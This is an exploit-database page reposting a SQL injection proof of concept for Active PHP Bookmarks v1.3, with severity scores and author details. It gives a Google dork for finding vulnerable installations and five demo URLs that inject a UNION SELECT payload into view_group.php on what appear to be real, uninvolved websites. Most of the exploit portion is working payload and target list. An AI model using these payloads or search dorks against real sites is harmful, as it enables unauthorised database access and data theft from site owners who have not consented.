Advertisement






Active PHP Bookmarks v1.3 - Sql Injection Vulnerability

CVE Category Price Severity
CWE-89 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2022-08-06
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080030

Below is a copy:

Active PHP Bookmarks v1.3 - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Active PHP Bookmarks v1.3 - Sql Injection Vulnerability
#Date: 2022-08-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Active PHP Bookmarks v1.3"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Active PHP Bookmarks v1.3"

### Demo :

https://www.egiveit.com/apb/view_group.php?id=-80%20union%20select%201,2,version(),4,5,6,7,8--

https://www.strav.com/apb/view_group.php?id=-82%20union%20select%201,2,version(),4,5,6,7,8--

https://blog.strav.net/apb/view_group.php?id=-99%20union%20select%201,2,version(),4,5,6,7,8--

https://www.zilliox.net/apb/view_group.php?id=-23%20union%20select%201,2,version(),4,5,6,7,8--

http://zilliox.us/apb/view_group.php?id=-38%20union%20select%201,2,version(),4,5,6,7,8--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.